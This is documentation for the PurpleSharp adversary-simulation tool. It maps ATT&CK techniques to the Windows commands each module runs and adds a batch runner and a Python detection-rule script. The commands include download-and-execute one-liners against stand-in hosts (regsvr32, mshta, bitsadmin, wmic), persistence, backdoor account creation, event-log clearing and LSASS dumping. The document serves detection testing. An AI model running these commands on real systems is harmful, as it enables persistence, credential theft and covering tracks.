# PurpleSharp

## Command and Scripting Interpreter: PowerShell

`.\PurpleSharp_x64.exe /t T1059.001`

Variation 1: this module uses the Win32 API CreateProcess to execute a specific command:

`powershell -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==`

Variation 2: this module uses the System.Management.Automation .NET namespace to execute the same script.

## Command and Scripting Interpreter: Windows Command Shell

`.\PurpleSharp_x64.exe /t T1059.003`

This module uses the Win32 API CreateProcess to execute a specific command:

`cmd.exe /C whoami`

## Command and Scripting Interpreter: Visual Basic

`.\PurpleSharp_x64.exe /t T1059.005`

This module uses the Win32 API CreateProcess to execute a specific command:

`wscript.exe invoice0420.vbs`

## Command and Scripting Interpreter: JavaScript/JScript

`.\PurpleSharp_x64.exe /t T1059.007`

This module uses the Win32 API CreateProcess to execute a specific command:

`wscript.exe invoice0420.js`

## System Services: Service Execution

`.\PurpleSharp_x64.exe /t T1569.002`

This module uses the Win32 API CreateProcess to execute a specific command:

`net start UpdaterService`

## Scheduled Task/Job: Scheduled Task

`.\PurpleSharp_x64.exe /t T1053.005`

This module uses the Win32 API CreateProcess to execute a specific command:

`SCHTASKS /CREATE /SC DAILY /TN BadScheduledTask /TR "C:\Windows\Temp\xyz12345.exe" /ST 13:00`

## Create Account: Local Account

`.\PurpleSharp_x64.exe /t T1136.001`

Variation 1: this module uses the Win32 API NetUserAdd to create a local account.

Variation 2: this module uses the Win32 API CreateProcess to execute a specific command:

`net user hax0r Passw0rd123El7 /add`

## Create or Modify System Process: Windows Service

`.\PurpleSharp_x64.exe /t T1543.003`

Variation 1: this module uses the Win32 API CreateService to create a Windows Service.

Variation 2: this module uses the Win32 API CreateProcess to execute a specific command:

`sc create UpdaterService binpath= C:\Windows\Temp\superlegit.exe type= own start= auto`

## Boot or Logon Autostart Execution: Registry Run Keys

`.\PurpleSharp_x64.exe /t T1547.001`

Variation 1: this module uses the Microsoft.Win32 .NET namespace to create a Registry Key.

Variation 2: this module uses the Win32 API CreateProcess to execute a specific command:

`REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V BadApp /t REG_SZ /F /D C:\Windows\Temp\xyz12345.exe`

## Event Triggered Execution: Windows Management Instrumentation Event Subscription

`.\PurpleSharp_x64.exe /t T1546.003`

This module uses the System.Management .NET namespace to create the main pieces of a WMI Event Subscription: an Event Filter, an Event Consumer and a FilterToConsumerBinding.

## Signed Binary Proxy Execution: Regsvr32

`.\PurpleSharp_x64.exe /t T1218.010`

This module uses the CreateProcess Win32 API to execute:

`regsvr32.exe /u /n /s /i:http://malicious.domain:8080/payload.sct scrobj.dll`

## Signed Binary Proxy Execution: Regsvcs/Regasm

`.\PurpleSharp_x64.exe /t T1218.009`

This module uses the CreateProcess Win32 API to execute:

`C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U winword.dll`

## Signed Binary Proxy Execution: InstallUtil

`.\PurpleSharp_x64.exe /t T1218.004`

This module uses the CreateProcess Win32 API to execute:

`C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfiles /LogToConsole=false /U C:\Windows\Temp\XKNqbpzl.exe`

## Deobfuscate/Decode Files or Information

`.\PurpleSharp_x64.exe /t T1140`

This module uses the CreateProcess Win32 API to execute:

`certutil.exe -decode encodedb64.txt decoded.exe`

## Signed Binary Proxy Execution: Mshta

`.\PurpleSharp_x64.exe /t T1218.005`

This module uses the CreateProcess Win32 API to execute:

`mshta.exe http://webserver/payload.hta`

## Signed Binary Proxy Execution: CMSTP

`.\PurpleSharp_x64.exe /t T1218.003`

This module uses the CreateProcess Win32 API to execute:

`cmstp.exe /s /ns C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt`

## BITS Jobs

`.\PurpleSharp_x64.exe /t T1197`

This module uses the CreateProcess Win32 API to execute:

`bitsadmin.exe /transfer job /download /priority high http://web.evil/sc.exe C:\Windows\Temp\winword.exe`

## Signed Binary Proxy Execution: Rundll32

`.\PurpleSharp_x64.exe /t T1218.011`

This module uses the CreateProcess Win32 API to execute:

`rundll32.exe C:\Windows\twain_64.dll`

## Indicator Removal on Host: Clear Windows Event Logs

`.\PurpleSharp_x64.exe /t T1070.001`

Variation 1: this module uses the System.Diagnostics .NET namespace to delete the Security Event Log.

Variation 2: this module uses the Win32 API CreateProcess to execute a specific command:

`wevtutil.exe cl Security`

## XSL Script Processing

`.\PurpleSharp_x64.exe /t T1220`

This module uses the CreateProcess Win32 API to execute:

`wmic.exe os get /FORMAT:"http://webserver/payload.xsl"`

## Process Injection: Portable Executable Injection

`.\PurpleSharp_x64.exe /t T1055.002`

This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread Win32 API functions to inject an innocuous shellcode.

## Process Injection: Asynchronous Procedure Call

`.\PurpleSharp_x64.exe /t T1055.004`

This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and QueueUserAPC Win32 API functions to inject an innocuous shellcode.

## Brute Force: Password Spraying

`.\PurpleSharp_x64.exe /t T1110.003`

Variation 1: this module uses the LogonUser Win32 API to test a single password across random users obtained via LDAP.

Variation 2: this module uses the WNetAddConnection2 Win32 API to test a single password across random users and random hosts obtained via LDAP.

## Steal or Forge Kerberos Tickets: Kerberoasting

`.\PurpleSharp_x64.exe /t T1558.003`

This module uses the KerberosRequestorSecurityToken class to obtain Kerberos service tickets.

## OS Credential Dumping: LSASS Memory

`.\PurpleSharp_x64.exe /t T1003.001`

This module uses the GetProcessesByName and MiniDumpWriteDump Win32 API functions to create a memory dump of the lsass.exe process.

## System Network Configuration Discovery

`.\PurpleSharp_x64.exe /t T1016`

This module uses the CreateProcess Win32 API to execute:

`ipconfig.exe /all`

## File and Directory Discovery

`.\PurpleSharp_x64.exe /t T1083`

This module uses the CreateProcess Win32 API to execute:

```
dir.exe c:\ >> %temp%\download
dir.exe C:\Users\ >> %temp%\download
```

## Network Share Discovery

`.\PurpleSharp_x64.exe /t T1135`

This module uses the NetShareEnum Win32 API function to enumerate shares on remote endpoints randomly picked using LDAP.

## Network Service Scanning

`.\PurpleSharp_x64.exe /t T1046`

This module uses the System.Net.Sockets .NET namespace to scan ports on remote endpoints randomly picked using LDAP.

## Account Discovery: Local Account

`.\PurpleSharp_x64.exe /t T1087.001`

This module uses the CreateProcess Win32 API to execute:

`net.exe user`

## Account Discovery: Domain Account

`.\PurpleSharp_x64.exe /t T1087.002`

Variation 1: this module uses the System.DirectoryServices .NET namespace to query a domain environment using LDAP.

Variation 2: this module uses the CreateProcess Win32 API to execute:

`net.exe user /domain`

## System Service Discovery

`.\PurpleSharp_x64.exe /t T1007`

This module uses the CreateProcess Win32 API to execute:

```
net.exe start
tasklist.exe /svc
```

## System Owner/User Discovery

`.\PurpleSharp_x64.exe /t T1033`

This module uses the CreateProcess Win32 API to execute:

```
whoami.exe
query user
```

## System Network Connections Discovery

`.\PurpleSharp_x64.exe /t T1049`

This module uses the CreateProcess Win32 API to execute:

```
netstat.exe
net.exe use
net.exe sessions
```

## Remote Services: Windows Remote Management

`.\PurpleSharp_x64.exe /t T1021.006`

## Audit.bat

Download the latest binary and run the following batch file to perform all of the simulations above, with a short pause between each so the resulting events are easy to separate in your telemetry:

```
@echo off
ECHO "Command and Scripting Interpreter: PowerShell"
.\PurpleSharp_x64.exe /t T1059.001
timeout /t 5
ECHO "Command and Scripting Interpreter: Windows Command Shell"
.\PurpleSharp_x64.exe /t T1059.003
timeout /t 5
ECHO "Command and Scripting Interpreter: Visual Basic"
.\PurpleSharp_x64.exe /t T1059.005
timeout /t 5
ECHO "Command and Scripting Interpreter: JavaScript/JScript"
.\PurpleSharp_x64.exe /t T1059.007
timeout /t 5
ECHO "System Services: Service Execution"
.\PurpleSharp_x64.exe /t T1569.002
timeout /t 5
ECHO "Scheduled Task/Job: Scheduled Task"
.\PurpleSharp_x64.exe /t T1053.005
timeout /t 5
ECHO "Create Account: Local Account"
.\PurpleSharp_x64.exe /t T1136.001
timeout /t 5
ECHO "Create or Modify System Process: Windows Service"
.\PurpleSharp_x64.exe /t T1543.003
timeout /t 5
ECHO "Boot or Logon Autostart Execution: Registry Run Keys"
.\PurpleSharp_x64.exe /t T1547.001
timeout /t 5
ECHO "Event Triggered Execution: Windows Management Instrumentation Event Subscription"
.\PurpleSharp_x64.exe /t T1546.003
timeout /t 5
ECHO "Signed Binary Proxy Execution: Regsvr32"
.\PurpleSharp_x64.exe /t T1218.010
timeout /t 5
ECHO "Signed Binary Proxy Execution: Regsvcs/Regasm"
.\PurpleSharp_x64.exe /t T1218.009
timeout /t 5
ECHO "Signed Binary Proxy Execution: InstallUtil"
.\PurpleSharp_x64.exe /t T1218.004
timeout /t 5
ECHO "Deobfuscate/Decode Files or Information"
.\PurpleSharp_x64.exe /t T1140
timeout /t 5
ECHO "Signed Binary Proxy Execution: Mshta"
.\PurpleSharp_x64.exe /t T1218.005
timeout /t 5
ECHO "Signed Binary Proxy Execution: CMSTP"
.\PurpleSharp_x64.exe /t T1218.003
timeout /t 5
ECHO "BITS Jobs"
.\PurpleSharp_x64.exe /t T1197
timeout /t 5
ECHO "Signed Binary Proxy Execution: Rundll32"
.\PurpleSharp_x64.exe /t T1218.011
timeout /t 5
ECHO "Indicator Removal on Host: Clear Windows Event Logs"
.\PurpleSharp_x64.exe /t T1070.001
timeout /t 5
ECHO "XSL Script Processing"
.\PurpleSharp_x64.exe /t T1220
timeout /t 5
ECHO "Process Injection: Portable Executable Injection"
.\PurpleSharp_x64.exe /t T1055.002
timeout /t 5
ECHO "Process Injection: Asynchronous Procedure Call"
.\PurpleSharp_x64.exe /t T1055.004
timeout /t 5
ECHO "Brute Force: Password Spraying"
.\PurpleSharp_x64.exe /t T1110.003
timeout /t 5
ECHO "Steal or Forge Kerberos Tickets: Kerberoasting"
.\PurpleSharp_x64.exe /t T1558.003
timeout /t 5
ECHO "OS Credential Dumping: LSASS Memory"
.\PurpleSharp_x64.exe /t T1003.001
timeout /t 5
ECHO "System Network Configuration Discovery"
.\PurpleSharp_x64.exe /t T1016
timeout /t 5
ECHO "File and Directory Discovery"
.\PurpleSharp_x64.exe /t T1083
timeout /t 5
ECHO "Network Share Discovery"
.\PurpleSharp_x64.exe /t T1135
timeout /t 5
ECHO "Network Service Scanning"
.\PurpleSharp_x64.exe /t T1046
timeout /t 5
ECHO "Account Discovery: Local Account"
.\PurpleSharp_x64.exe /t T1087.001
timeout /t 5
ECHO "Account Discovery: Domain Account"
.\PurpleSharp_x64.exe /t T1087.002
timeout /t 5
ECHO "System Service Discovery"
.\PurpleSharp_x64.exe /t T1007
timeout /t 5
ECHO "System Owner/User Discovery"
.\PurpleSharp_x64.exe /t T1033
timeout /t 5
ECHO "System Network Connections Discovery"
.\PurpleSharp_x64.exe /t T1049
timeout /t 5
ECHO "Remote Services: Windows Remote Management"
.\PurpleSharp_x64.exe /t T1021.006
```
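Once Audit.bat has run, the useful check is whether your process-creation telemetry (Security 4688 or Sysmon Event ID 1) actually captured the commands listed above. The following is an added example, not PurpleSharp's own code: a small rule set keyed by the ATT&CK IDs on this page, applied to sample command lines copied from the simulations, plus a decoder for the PowerShell `-enc` payload so the analyst can see what the encoded script does. The rules are regular expressions written for this illustration and are an assumption about what a detection should look for, not a product signature.

```python
import base64
import re

# Added example: map process-creation command lines to the ATT&CK IDs used in this guide.
RULES = [
    ("T1059.001", r"powershell(\.exe)?\s.*-e(nc|c|ncodedcommand)?\s"),
    ("T1053.005", r"schtasks(\.exe)?\s.*/create\s.*\\temp\\"),
    ("T1136.001", r"\bnet(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("T1543.003", r"\bsc(\.exe)?\s+create\s.*binpath=\s*\S*\\temp\\"),
    ("T1547.001", r"\breg(\.exe)?\s+add\s.*\\currentversion\\run\b"),
    ("T1218.010", r"regsvr32(\.exe)?\s.*/i:https?://"),
    ("T1218.005", r"mshta(\.exe)?\s+https?://"),
    ("T1140", r"certutil(\.exe)?\s.*-decode\b"),
    ("T1197", r"bitsadmin(\.exe)?\s.*/transfer\s.*/download\b"),
    ("T1070.001", r"wevtutil(\.exe)?\s+cl\s+security\b"),
    ("T1220", r"wmic(\.exe)?\s.*/format:?\s*[\"']?https?://"),
]

def classify(cmdline):
    """Return the technique IDs whose rule matches this command line (empty if none)."""
    return [tid for tid, pat in RULES if re.search(pat, cmdline, re.IGNORECASE)]

def decode_encoded_command(cmdline):
    """Recover the script behind a PowerShell -enc argument (base64 of UTF-16LE), or None."""
    m = re.search(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

# Sample command lines from the simulations above; "cmd.exe /C whoami" is a non-matching case.
SAMPLES = [
    "powershell -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==",
    "cmd.exe /C whoami",
    r'SCHTASKS /CREATE /SC DAILY /TN BadScheduledTask /TR "C:\Windows\Temp\xyz12345.exe" /ST 13:00',
    "regsvr32.exe /u /n /s /i:http://malicious.domain:8080/payload.sct scrobj.dll",
    "certutil.exe -decode encodedb64.txt decoded.exe",
    "wevtutil.exe cl Security",
]

def scan(lines):
    """Return {command line: technique IDs} for every line that hits at least one rule."""
    return {line: hits for line in lines if (hits := classify(line))}

if __name__ == "__main__":
    for line, hits in scan(SAMPLES).items():
        print(f"{', '.join(hits):10} {line}")
        if (decoded := decode_encoded_command(line)):
            print(f"{'':10} decoded -enc payload: {decoded!r}")
```

A simulation whose command line does not show up in `scan()` output when fed your real 4688/Sysmon records means the logging gap, not the detection rule, is what needs fixing first.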
